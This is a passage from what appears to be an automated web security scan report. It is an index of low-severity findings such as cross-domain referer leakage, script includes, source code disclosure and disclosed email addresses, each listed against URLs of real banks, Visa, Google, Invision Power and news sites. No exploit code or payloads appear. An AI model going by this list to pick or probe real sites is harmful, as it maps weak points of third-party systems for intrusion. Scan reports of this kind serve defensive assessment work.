12.7. http://fis.com/fis/worldnews/worldnews.asp

12.8. http://fis.com/fis/worldnews/worldnews.asp

12.9. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/

12.10. http://ipboard-software.software.informer.com/

12.11. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

12.12. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

12.13. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

12.14. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

12.15. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

12.16. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

12.17. https://support01.arbornetworks.com/

12.18. http://twitter.com/PracticalMoney

12.19. http://twitter.com/navyfederalnews

12.20. https://windlass.navfedcu.org/

12.21. https://www.arbornetworks.com/index.php

12.22. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

12.23. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html

12.24. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

12.25. http://www.facebook.com/2008/fbml

12.26. http://www.fis.com/fis/worldnews/worldnews.asp

12.27. http://www.fis.com/fis/worldnews/worldnews.asp

12.28. http://www.fis.com/fis/worldnews/worldnews.asp

12.29. https://www.google.com/accounts/Login

12.30. https://www.google.com/accounts/ServiceLogin

12.31. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html

12.32. http://www.sipc.org/

13. Source code disclosure

13.1. http://community.invisionpower.com/public/js/3rd_party/prettify/prettify.js

13.2. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab

13.3. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

13.4. https://www.ibsnetaccess.com/css/styles.css

13.5. https://www4.usbank.com/favicon.ico

14. Referer-dependent response

14.1. http://ad.thehill.com/www/delivery/al.php

14.2. http://community.invisionpower.com/clickheat/click.php

14.3. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390

14.4. http://fx-rate.net/fx-rates.php

14.5. http://www.facebook.com/plugins/like.php

15. Cross-domain POST

15.1. http://community.invisionpower.com/resources/documentation/index.html

15.2. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17

15.3. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

15.4. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

15.5. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

15.6. http://jquery.com/demo/thickbox/

15.7. http://webcache.googleusercontent.com/search

15.8. http://www.asual.com/swfaddress/

15.9. http://www.citi.com/domain/cm/js/branding.js

15.10. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

15.11. http://www.invisionpower.com/

15.12. http://www.invisionpower.com/ccs_forums_install/index.php

15.13. http://www.invisionpower.com/company/contact.php

15.14. http://www.invisionpower.com/company/faq.php

15.15. http://www.invisionpower.com/company/mailing_list_error.php

15.16. http://www.invisionpower.com/company/mailing_list_thanks.php

15.17. http://www.invisionpower.com/company/standards.php

15.18. http://www.invisionpower.com/hosting/

15.19. http://www.invisionpower.com/hosting/advanced.php

15.20. http://www.invisionpower.com/hosting/status.php

15.21. http://www.invisionpower.com/legal/hosting_policies.php

15.22. http://www.invisionpower.com/legal/privacy.php

15.23. http://www.invisionpower.com/products/

15.24. http://www.invisionpower.com/products/blog/

15.25. http://www.invisionpower.com/products/board/

15.26. http://www.invisionpower.com/products/board/features/

15.27. http://www.invisionpower.com/products/board/purchase.php

15.28. http://www.invisionpower.com/products/board/whats_new.php

15.29. http://www.invisionpower.com/products/chat/

15.30. http://www.invisionpower.com/products/content/

15.31. http://www.invisionpower.com/products/converge/

15.32. http://www.invisionpower.com/products/downloads/

15.33. http://www.invisionpower.com/products/gallery/

15.34. http://www.invisionpower.com/products/nexus/

15.35. http://www.invisionpower.com/products/nexus/features/store.php

15.36. http://www.invisionpower.com/products/spammonitor/

15.37. http://www.invisionpower.com/store/

15.38. http://www.invisionpower.com/store/index.php

15.39. http://www.invisionpower.com/suite/

15.40. http://www.invisionpower.com/suite/convert.php

15.41. http://www.invisionpower.com/suite/demo.php

15.42. http://www.invisionpower.com/suite/iphone

15.43. http://www.invisionpower.com/suite/license_benefits.php

15.44. http://www.invisionpower.com/suite/requirements.php

15.45. https://www.pnc.com/webapp/unsec/Blank.do

15.46. https://www.wachovia.com/helpcenter

16. Cross-domain Referer leakage

16.1. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

16.2. http://citi.bridgetrack.com/a/s/

16.3. http://community.invisionpower.com/index.php

16.4. http://community.invisionpower.com/index.php

16.5. http://community.invisionpower.com/index.php

16.6. http://community.invisionpower.com/index.php

16.7. http://community.invisionpower.com/index.php

16.8. http://community.invisionpower.com/index.php

16.9. http://docs.google.com/viewer

16.10. http://fis.com/fis/worldnews/worldnews.asp

16.11. http://fls.doubleclick.net/activityi

16.12. http://fls.doubleclick.net/activityi

16.13. http://googleads.g.doubleclick.net/pagead/ads

16.14. http://googleads.g.doubleclick.net/pagead/ads

16.15. http://groups.google.com/groups

16.16. http://groups.google.com/groups

16.17. http://groups.google.com/grphp

16.18. http://homeloanhelp.bankofamerica.com/en/index.html

16.19. http://maps.google.com/maps

16.20. http://maps.google.com/maps

16.21. http://maps.google.com/maps

16.22. http://maps.google.com/maps/place

16.23. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc

16.24. http://news.google.com/news

16.25. http://news.google.com/news/advanced_news_search

16.26. http://news.google.com/news/directory

16.27. http://news.google.com/news/more

16.28. http://news.google.com/news/search

16.29. http://news.google.com/news/search

16.30. http://news.google.com/news/section

16.31. http://news.google.com/news/section

16.32. http://news.google.com/news/section

16.33. http://news.google.com/news/section

16.34. http://news.google.com/news/section

16.35. http://news.google.com/news/section

16.36. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

16.37. https://onlineservices.wachovia.com/auth/AuthService

16.38. http://picasaweb.google.com/lh/view

16.39. https://picasaweb.google.com/lh/view

16.40. http://translate.google.com/

16.41. http://translate.google.com/translate_t

16.42. http://translate.google.com/translate_t

16.43. http://usa.visa.com/

16.44. http://video.google.com/

16.45. http://webcache.googleusercontent.com/search

16.46. http://www.abc.net.au/news/stories/2011/01/20/3117032.htm

16.47. http://www.arbornetworks.com/index.php

16.48. http://www.arbornetworks.com/index.php

16.49. https://www.arbornetworks.com/index.php

16.50. http://www.bankofamerica.com/index.cfm

16.51. http://www.bankofamerica.com/index.cfm

16.52. https://www.bankofamerica.com/credit-cards/cardoverview.action

16.53. https://www.bankofamerica.com/homepage/WidgetAction.go

16.54. https://www.bankofamerica.com/homepage/overview.go

16.55. http://www.capitalone.com/about/

16.56. http://www.capitalone.com/careers/

16.57. http://www.capitalone.com/financialeducation/

16.58. http://www.capitalone.com/smallbusiness/

16.59. http://www.capitalone.com/smallbusiness/business-money-market/

16.60. http://www.capitalone.com/smallbusiness/cards/

16.61. http://www.capitalone.com/smallbusiness/cards/index.php

16.62. http://www.capitalone.com/smallbusiness/payroll/

16.63. http://www.charterone.com/greensense/

16.64. http://www.charterone.com/moneyhelp/

16.65. http://www.charterone.com/savings-and-cds/goaltrack-savings.aspx

16.66. http://www.charterone.com/services/standard-overdraft-practices.aspx

16.67. http://www.charterone.com/tools/leaving.aspx

16.68. http://www.charterone.com/tools/regionalgateway.aspx

16.69. http://www.charterone.com/trufitstudentloan/

16.70. https://www.chase.com/auto-loan/car-loan.htm

16.71. https://www.chase.com/ccp/index.jsp

16.72. https://www.chase.com/index.jsp

16.73. http://www.chasemilitary.com/Default.aspx

16.74. http://www.citizensbank.com/checking/gold-banking-package.aspx

16.75. http://www.citizensbank.com/greensense/

16.76. http://www.citizensbank.com/moneyhelp/

16.77. http://www.citizensbank.com/mortgages/home-refinance.aspx

16.78. http://www.citizensbank.com/savings-and-cds/college-saver.aspx

16.79. http://www.citizensbank.com/savings-and-cds/goaltrack-savings.aspx

16.80. http://www.citizensbank.com/savings-and-cds/homebuyer-savings.aspx

16.81. http://www.citizensbank.com/services/standard-overdraft-practices.aspx

16.82. http://www.citizensbank.com/tools/leaving.aspx

16.83. http://www.citizensbank.com/tools/regionalgateway.aspx

16.84. http://www.citizensbank.com/trufitstudentloan/

16.85. http://www.emagazine.com/view/

16.86. http://www.facebook.com/plugins/like.php

16.87. http://www.firstnational.com/001/html/en/personal/online_serv/account_alerts.html

16.88. http://www.firstnational.com/001/html/en/personal/online_serv/online_banking.html

16.89. http://www.firstnational.com/001/html/en/personal/online_serv/online_billpay.html

16.90. http://www.firstnational.com/001/html/en/personal/online_serv/online_services.html

16.91. http://www.firstnational.com/001/html/en/personal/online_serv/paperless_statements.html

16.92. http://www.firstnational.com/001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html

16.93. http://www.firstnational.com/001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html

16.94. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html

16.95. http://www.fis.com/fis/worldnews/worldnews.asp

16.96. http://www.google.com/advanced_search

16.97. http://www.google.com/finance

16.98. http://www.google.com/finance

16.99. http://www.google.com/finance

16.100. http://www.google.com/finance

16.101. http://www.google.com/images

16.102. http://www.google.com/images

16.103. http://www.google.com/imghp

16.104. http://www.google.com/language_tools

16.105. http://www.google.com/prdhp

16.106. http://www.google.com/preferences

16.107. http://www.google.com/quality_form

16.108. http://www.google.com/realtime

16.109. http://www.google.com/search

16.110. http://www.google.com/search

16.111. http://www.google.com/search

16.112. http://www.google.com/search

16.113. http://www.google.com/search

16.114. http://www.google.com/search

16.115. http://www.google.com/search

16.116. http://www.google.com/search

16.117. http://www.google.com/search

16.118. http://www.google.com/support/news/bin/answer.py

16.119. http://www.google.com/support/news/bin/answer.py

16.120. http://www.google.com/support/news_pub/bin/static.py

16.121. http://www.google.com/support/websearch/bin/answer.py

16.122. http://www.google.com/url

16.123. http://www.google.com/url

16.124. http://www.google.com/webhp

16.125. http://www.google.com/webhp

16.126. http://www.invisionpower.com/store/index.php

16.127. http://www.jpmorganchase.com/corporate/Home/home.htm

16.128. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx

16.129. http://www.learningsolutions.com.hk/index.php

16.130. http://www.macromedia.com/shockwave/download/index.cgi

16.131. http://www.merrilledge.com/m/pages/self-directed-investing.aspx

16.132. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx

16.133. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

16.134. https://www.navyfederal.org/products-services/checking-savings/savings-rates.php

16.135. https://www.navyfederal.org/search.php

16.136. https://www.navyfederal.org/vendors/vendorMain.php

16.137. http://www.navyfederalresearch.org/se.ashx

16.138. http://www.perishablenews.com/index.php

16.139. https://www.pnc.com/webapp/sec/Forms.do

16.140. https://www.pnc.com/webapp/sec/ProductsAndService.do

16.141. https://www.pnc.com/webapp/unsec/Blank.do

16.142. https://www.pnc.com/webapp/unsec/Blank.do

16.143. https://www.pnc.com/webapp/unsec/Homepage.do

16.144. https://www.pnc.com/webapp/unsec/Homepage.do

16.145. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

16.146. https://www.pnc.com/webapp/unsec/ProductsAndService.do

16.147. https://www.pnc.com/webapp/unsec/Solutions.do

16.148. http://www.thestandard.com.hk/news_detail.asp

16.149. http://www.thestandard.com.hk/news_detail.asp

16.150. https://www.wachovia.com/enroll

16.151. https://www.wachovia.com/foundation/v/index.jsp

16.152. https://www.wachovia.com/foundation/v/index.jsp

16.153. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

16.154. https://www.wellsfargo.com/jump/wachovia/insurance/identity

16.155. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

16.156. https://www.wellsfargo.com/mortgage/rates

16.157. https://www.wellsfargo.com/mortgage/rates

16.158. https://www.wellsfargo.com/wachovia/insurance

16.159. http://www.youtube.com/

16.160. http://www.youtube.com/

17. Cross-domain script include

17.1. http://ahead.bankofamerica.com/

17.2. http://ahead.bankofamerica.com/quarterly-impact-report-3rd-quarter-2010/

17.3. http://asert.arbornetworks.com/

17.4. http://brandonaaron.net/

17.5. http://careers.jpmorganchase.com/career/careerhome

17.6. http://cnews.canoe.ca/CNEWS/Environment/Suzuki/2011/01/18/16940341.html

17.7. http://code.google.com/p/swfobject/

17.8. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/

17.9. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/

17.10. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/

17.11. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/

17.12. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

17.13. http://creativecommons.org/licenses/by-nc-nd/3.0/

17.14. http://creativecommons.org/licenses/by/2.5/

17.15. http://docs.jquery.com/UI

17.16. http://docs.jquery.com/UI/Accordion

17.17. http://docs.jquery.com/UI/Mouse

17.18. http://docs.jquery.com/UI/Slider

17.19. http://docs.jquery.com/UI/Tabs

17.20. http://docs.jquery.com/UI/Widget

17.21. http://en.wikipedia.org/wiki/Invision_Power_Board

17.22. http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html

17.23. http://fis.com/fis/worldnews/worldnews.asp

17.24. http://googlenewsblog.blogspot.com/

17.25. http://groups.google.com/grphp

17.26. http://ipboard-software.software.informer.com/

17.27. http://jquery.andreaseberhard.de/

17.28. http://jquery.com/

17.29. http://jquery.com/demo/thickbox/

17.30. http://jquery.org/license

17.31. http://jqueryui.com/about

17.32. http://learn.bankofamerica.com/

17.33. http://m.usa.visa.com/m/assistance/access.jsp

17.34. http://m.usa.visa.com/m/assistance/contact.jsp

17.35. http://m.usa.visa.com/m/assistance/index.jsp

17.36. http://m.usa.visa.com/m/assistance/lost.jsp

17.37. http://m.usa.visa.com/m/cards/buxx.jsp

17.38. http://m.usa.visa.com/m/cards/credit.jsp

17.39. http://m.usa.visa.com/m/cards/debit.jsp

17.40. http://m.usa.visa.com/m/cards/gift.jsp

17.41. http://m.usa.visa.com/m/cards/index.jsp

17.42. http://m.usa.visa.com/m/cards/prepaid.jsp

17.43. http://m.usa.visa.com/m/cards/readylink.jsp

17.44. http://m.usa.visa.com/m/cards/travelmoney.jsp

17.45. http://m.usa.visa.com/m/discounts/index.jsp

17.46. http://m.usa.visa.com/m/index.jsp

17.47. http://m.usa.visa.com/m/legal.jsp

17.48. http://mir.aculo.us/

17.49. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc

17.50. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

17.51. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

17.52. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

17.53. https://onlineservices.wachovia.com/auth/AuthService

17.54. http://picasaweb.google.com/lh/view

17.55. https://picasaweb.google.com/lh/view

17.56. http://script.aculo.us/

17.57. http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html

17.58. http://search.wareseeker.com/ip-board/

17.59. http://sj.farmonline.com.au/news/state/viticulture/general/clean-seas-flags-smoother-sailing-ahead/2056939.aspx

17.60. http://survey.questus.com/survey/qst/qst10001

17.61. http://switchboard.nrdc.org/blogs/lsuatoni/the_evaluation_of_deepwater_ho.html

17.62. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

17.63. http://twitter.com/PracticalMoney

17.64. http://twitter.com/navyfederalnews

17.65. https://usa.visa.com/signaturesouthwest/index.jsp

17.66. http://visa.via.infonow.net/usa_atm/

17.67. http://webcache.googleusercontent.com/search

17.68. http://www.arbornetworks.com/

17.69. http://www.arbornetworks.com/cleanpipes

17.70. http://www.arbornetworks.com/cn/865.html

17.71. http://www.arbornetworks.com/cn/infrastructure-security-report.html

17.72. http://www.arbornetworks.com/contact

17.73. http://www.arbornetworks.com/de/5.html

17.74. http://www.arbornetworks.com/de/infrastructure-security-report.html

17.75. http://www.arbornetworks.com/deeppacketinspection

17.76. http://www.arbornetworks.com/en/9.html

17.77. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html

17.78. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html

17.79. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html

17.80. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html

17.81. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html

17.82. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html

17.83. http://www.arbornetworks.com/en/channel-partners-3.html

17.84. http://www.arbornetworks.com/en/com-5fcontent/view-2.html

17.85. http://www.arbornetworks.com/en/com-5fcontent/view-3.html

17.86. http://www.arbornetworks.com/en/contact-us-4.html

17.87. http://www.arbornetworks.com/en/contact-us.html

17.88. http://www.arbornetworks.com/en/customer-solution-briefs.html

17.89. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html

17.90. http://www.arbornetworks.com/en/ipv6-report.html

17.91. http://www.arbornetworks.com/en/meet-our-partners.html

17.92. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html

17.93. http://www.arbornetworks.com/en/network-security-experts-2.html

17.94. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html

17.95. http://www.arbornetworks.com/en/network-security-research-2.html

17.96. http://www.arbornetworks.com/en/network-security-visibility-products-235.html

17.97. http://www.arbornetworks.com/en/network-solutions-we-provide.html

17.98. http://www.arbornetworks.com/en/news-events.html

17.99. http://www.arbornetworks.com/en/partnership-inquiry-form.html

17.100. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html

17.101. http://www.arbornetworks.com/en/solution-partners-4.html

17.102. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html

17.103. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html

17.104. http://www.arbornetworks.com/en/technology-partners-4.html

17.105. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html

17.106. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html

17.107. http://www.arbornetworks.com/es/5.html

17.108. http://www.arbornetworks.com/es/infrastructure-security-report.html

17.109. http://www.arbornetworks.com/fr/4.html

17.110. http://www.arbornetworks.com/fr/infrastructure-security-report.html

17.111. http://www.arbornetworks.com/index.php

17.112. http://www.arbornetworks.com/it

17.113. http://www.arbornetworks.com/it/infrastructure-security-report.html

17.114. http://www.arbornetworks.com/jp/2.html

17.115. http://www.arbornetworks.com/jp/infrastructure-security-report.html

17.116. http://www.arbornetworks.com/kr/2.html

17.117. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html

17.118. http://www.arbornetworks.com/privacy_policy.php

17.119. http://www.arbornetworks.com/report

17.120. https://www.arbornetworks.com/

17.121. https://www.arbornetworks.com/en/lost-password-3.html

17.122. https://www.arbornetworks.com/index.php

17.123. http://www.bankofamerica.com/index.cfm

17.124. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

17.125. http://www.callforaction.org/

17.126. http://www.capitalone.com/smallbusiness/

17.127. http://www.capitalone.com/smallbusiness/business-money-market/

17.128. http://www.capitalone.com/smallbusiness/cards/

17.129. http://www.capitalone.com/smallbusiness/cards/index.php

17.130. http://www.capitalone.com/smallbusiness/payroll/

17.131. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html

17.132. http://www.charterone.com/branchlocator/

17.133. http://www.charterone.com/greensense/

17.134. http://www.citizensbank.com/branchlocator/

17.135. http://www.citizensbank.com/greensense/

17.136. http://www.cnn.com/2011/TECH/web/01/28/egypt.internet.shutdown/index.html

17.137. http://www.courthousenews.com/2011/01/14/33343.htm

17.138. http://www.digitalia.be/software/slimbox

17.139. http://www.directstartv.com/

17.140. http://www.emagazine.com/view/

17.141. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

17.142. http://www.experian.com/

17.143. http://www.facebook.com/2008/fbml

17.144. http://www.facebook.com/plugins/like.php

17.145. http://www.facebook.com/plugins/like.php

17.146. http://www.filamentgroup.com/

17.147. http://www.firstnational.com/001/html/en/personal/personal.html

17.148. http://www.fis.com/fis/worldnews/worldnews.asp

17.149. http://www.forum-software.org/tag/ipboard

17.150. http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia

17.151. http://www.google.com/intl/en/options/

17.152. http://www.google.com/services/

17.153. http://www.google.com/support/news/bin/answer.py

17.154. http://www.google.com/support/news_pub/bin/static.py

17.155. http://www.google.com/support/websearch/bin/answer.py

17.156. http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren

17.157. http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house

17.158. http://www.heraldsun.com.au/ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919

17.159. http://www.invisionpower.com/company/contact.php

17.160. http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1

17.161. http://www.jpmorganchase.com/corporate/Home/home.htm

17.162. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx

17.163. http://www.julong.com.cn/en/News/188.html

17.164. http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html

17.165. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html

17.166. http://www.merrilledge.com/m/pages/self-directed-investing.aspx

17.167. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx

17.168. https://www.merrilledge.com/m/pages/home.aspx

17.169. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

17.170. http://www.monstersandcritics.com/news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species

17.171. http://www.news.com.au/business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916

17.172. http://www.nickstakenburg.com/

17.173. http://www.nickstakenburg.com/projects/lightview/

17.174. http://www.opensource.org/licenses/gpl-license.php

17.175. http://www.opensource.org/licenses/mit-license.php

17.176. http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market

17.177. http://www.perishablenews.com/index.php

17.178. https://www.pnc.com/webapp/unsec/Homepage.do

17.179. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

17.180. https://www.pnc.com/webapp/unsec/Solutions.do

17.181. https://www.pncvirtualwallet.com/

17.182. http://www.portlincolntimes.com.au/news/local/news/general/captive-tuna-spawn-again/2056995.aspx

17.183. http://www.projo.com/opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html

17.184. http://www.retirement.merrilledge.com/IRA/pages/home.aspx

17.185. http://www.rthk.org.hk/rthk/news/englishnews/20110126/news_20110126_56_729958.htm

17.186. http://www.smh.com.au/environment/whale-watch/bps-plan-could-impact-on-whales-groups-20110118-19v04.html

17.187. http://www.theaustralian.com.au/business/clean-seas-tuna-scales-back-its-losses/story-e6frg8zx-1225993875502

17.188. http://www.thestandard.com.hk/news_detail.asp

17.189. http://www.thestandard.com.hk/news_detail.asp

17.190. http://www.upi.com/Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/

17.191. http://www.ustrust.com/ust/pages/index.aspx

17.192. http://www.wcti12.com/news/26551757/detail.html

17.193. http://www.webveteran.com/

17.194. http://www.youtube.com/

17.195. http://www.youtube.com/

18. File upload functionality

18.1. http://translate.google.com/

18.2. http://translate.google.com/translate_t

19. Email addresses disclosed

19.1. http://ads.adbrite.com/adserver/vdi/762701

19.2. http://ads.adbrite.com/adserver/vdi/762701

19.3. http://ads.adbrite.com/adserver/vdi/762701

19.4. http://ads.adbrite.com/adserver/vdi/762701

19.5. http://ads.adbrite.com/adserver/vdi/762701

19.6. https://arbor.custhelp.com/app/home

19.7. https://arbor.custhelp.com/app/ipreaddress

19.8. https://arbor.custhelp.com/app/utils/account_assistance

19.9. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

19.10. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

19.11. http://blog.deconcept.com/2006/01/11/getvariable-setvariable-crash-internet-explorer-flash-6/

19.12. http://blog.deconcept.com/2006/07/28/swfobject-143-released/

19.13. http://careers.bankofamerica.com/overview/overview.asp

19.14. http://code.google.com/p/swfobject/

19.15. http://community.invisionpower.com/

19.16. http://community.invisionpower.com/forum/180-invision-power-services-inc/

19.17. http://community.invisionpower.com/forum/305-pre-sales-questions/

19.18. http://community.invisionpower.com/index.php

19.19. http://community.invisionpower.com/rss/blog/

19.20. http://community.invisionpower.com/topic/331403-custom-home-page/

19.21. http://community.invisionpower.com/user/102895-dawpi/

19.22. http://community.invisionpower.com/user/1092-breadfan/

19.23. http://community.invisionpower.com/user/125748-townie83/

19.24. http://community.invisionpower.com/user/13576-admiralty/

19.25. http://community.invisionpower.com/user/140069-heyhoe/

19.26. http://community.invisionpower.com/user/142765-fishfish0001/

19.27. http://community.invisionpower.com/user/150179-cloaked/

19.28. http://community.invisionpower.com/user/157503-therevtastic/

19.29. http://community.invisionpower.com/user/157929-paul-barnes/

19.30. http://community.invisionpower.com/user/179899-alessandror/

19.31. http://community.invisionpower.com/user/189809-4ipbcom/

19.32. http://community.invisionpower.com/user/46326-nidoking/

19.33. http://community.invisionpower.com/user/49-charles/

19.34. http://community.invisionpower.com/user/659-blush/

19.35. http://community.invisionpower.com/user/74840-dr-jekyll/

19.36. http://community.invisionpower.com/user/79427-zbahadir/

19.37. http://community.invisionpower.com/user/79705-sephi-kun/

19.38. http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html

19.39. http://fis.com/fis/worldnews/worldnews.asp

19.40. http://groups.google.com/groups

19.41. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/

19.42. http://jqueryui.com/about

19.43. http://lovely-faces.com/lib/js/ModalPopups.js

19.44. http://m.usa.visa.com/m/legal.jsp

19.45. http://mir.aculo.us/

19.46. http://news.google.com/news

19.47. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

19.48. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

19.49. http://search.wachovia.com/selfservice/jslib/CalendarPopup.js

19.50. http://usa.visa.com/about_visa/ask_visa/index.html

19.51. http://usa.visa.com/js/visa.js

19.52. http://usa.visa.com/merchants/index.html

19.53. http://usa.visa.com/personal/security/get-help-now.html

19.54. http://usa.visa.com/personal/security/identity_theft_search.jsp

19.55. http://usa.visa.com/personal/using_visa/visa_travelers_cheques.html

19.56. http://usa.visa.com/sitewide/legal.html

19.57. http://usa.visa.com/sitewide/privacy_policy.html

19.58. https://usa.visa.com/signaturesouthwest/index.jsp

19.59. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html

19.60. http://www.arbornetworks.com/en/news-events.html

19.61. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html

19.62. http://www.arbornetworks.com/jp/infrastructure-security-report.html

19.63. http://www.asual.com/swfaddress/

19.64. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

19.65. http://www.capitalone.com/autoloans/auto-loan-calculator.php

19.66. http://www.capitalone.com/autoloans/refinance/

19.67. http://www.capitalone.com/contactus/

19.68. http://www.capitalone.com/fraud/prevention/index.php

19.69. http://www.capitalone.com/protection/security/index.php

19.70. https://www.capitalone.com/css/footer.css

19.71. https://www.capitalone.com/css/framework/base.css

19.72. https://www.capitalone.com/css/framework/grid.css

19.73. https://www.capitalone.com/css/framework/print.css

19.74. https://www.capitalone.com/css/header.css

19.75. https://www.capitalone.com/css/page-nav-heading.css

19.76. https://www.capitalone.com/css/page-type/homepage.css

19.77. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html

19.78. http://www.change.org/javascripts/application.js

19.79. http://www.charterone.com/scripts/overlaybox/browserdetectlite.js

19.80. http://www.charterone.com/security/

19.81. https://www.chase.com/index.jsp

19.82. http://www.chasemilitary.com/js/DD_belatedPNG_0.0.8a-min.js

19.83. http://www.china-iwb.com/abcde/Editor/UploadFile/2009522165941674.pdf

19.84. http://www.citizensbank.com/online-banking/faq.aspx

19.85. http://www.citizensbank.com/scripts/overlaybox/browserdetectlite.js

19.86. http://www.citizensbank.com/security/

19.87. http://www.directstartv.com/

19.88. http://www.emagazine.com/view/

19.89. http://www.fdic.gov/

19.90. http://www.filamentgroup.com/

19.91. http://www.firstnational.com/001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html

19.92. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html

19.93. http://www.firstnational.com/config/html/en/js/dragdrop.js

19.94. http://www.fis.com/fis/worldnews/worldnews.asp

19.95. http://www.forum-software.org/tag/ipboard

19.96. http://www.gnu.org/copyleft/gpl.html

19.97. http://www.gnu.org/licenses/gpl.html

19.98. http://www.gnu.org/licenses/licenses.html

